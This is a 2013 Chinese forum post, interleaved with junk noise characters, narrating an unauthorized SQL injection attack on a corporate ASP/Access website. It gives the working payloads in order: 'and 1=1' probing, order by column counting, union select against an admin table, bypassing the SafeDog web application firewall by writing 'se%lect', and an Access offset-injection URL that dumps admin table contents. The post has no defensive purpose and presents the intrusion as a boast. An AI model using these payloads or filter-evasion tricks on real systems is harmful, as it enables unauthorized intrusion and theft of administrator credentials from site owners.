打开网站,一个企业站。9 t' H1 D" O2 c) I2 M) C% [
) c/ l) T8 w2 {, P% n5 K5 f
+ v% e: T7 M7 z. w顺手加个admin6 d( }6 d' b9 a( M
& s$ N3 r8 w% o1 y1 }5 I( x
& x/ w2 ^) h( p1 C( t1 d7 p默认后台。
0 i$ H* @* |/ Q% d+ {9 K; s回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。# D: W# B7 h ~( C E) j
1 `, B6 {* U( s$ a* W Q0 g9 R7 @8 Y, M( ?
# f- Y$ ~! x1 q P$ c: [
所以就不用御剑扫了,待会直接封IP。
) z. B: y2 n M
$ z8 s- |4 W, k用order by语句判断是否存在注入。9 n7 W# I- [, R1 G$ W" ]" X
http://www.xxx.com /product_show.asp?id=997 order by 1
& P6 \% P: a4 E2 ohttp://www.xxx.com /product_show.asp?id=997 order by 100
* v7 }; x+ \) D; V2 q- ]. f现在存在注入,经测试后发现是9个字段。6 Q+ C: V& y! B) P9 p: q- Q K
5 P( ~+ s; m# v/ J I* R; s接下来进行联合查询,猜是否存在admin表。: m; F+ W5 Q# X7 e5 `- Q, W+ g4 Y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
! P; ~, `* h& ?6 ~. ~# A5 T) A- t! N! z
- E6 ]5 N2 h# H% a- ~% j
; P# m" C* h2 W! u4 _3 L4 T2 m* X在select中间加个%,se%lect绕过安全狗。
! B" Z' L. e! w* `- Z7 R2 v1 ~" p& [9 z" c+ @( D
; q' E" M4 ?1 {0 U2 b0 X
发现存在admin表,然后开始手工猜常用的字段。
3 q; F' Y/ p: B. O纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。5 Y+ N3 }8 R0 U5 S* P9 g3 b3 }
6 X" k1 Z/ A( `, N- `6 \0 H4 B3 h( q0 I
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。, W V9 @2 v+ f
7 x$ i9 W& P" c科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。& @& z4 ?# T5 ]/ o- E
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
- k; {/ R, m. H( u好了,敏感内容出显了。- }: P9 ]7 t& w: u2 M7 V- U# ~3 {- }' q
8 w2 S/ Y0 ~* h( X% ]' T& A7 L4 V7 G) Q- T( y; f4 V
6 b1 ]$ V) l( M) u |
发表于 2013-3-8 21:49:45
收藏
支持
反对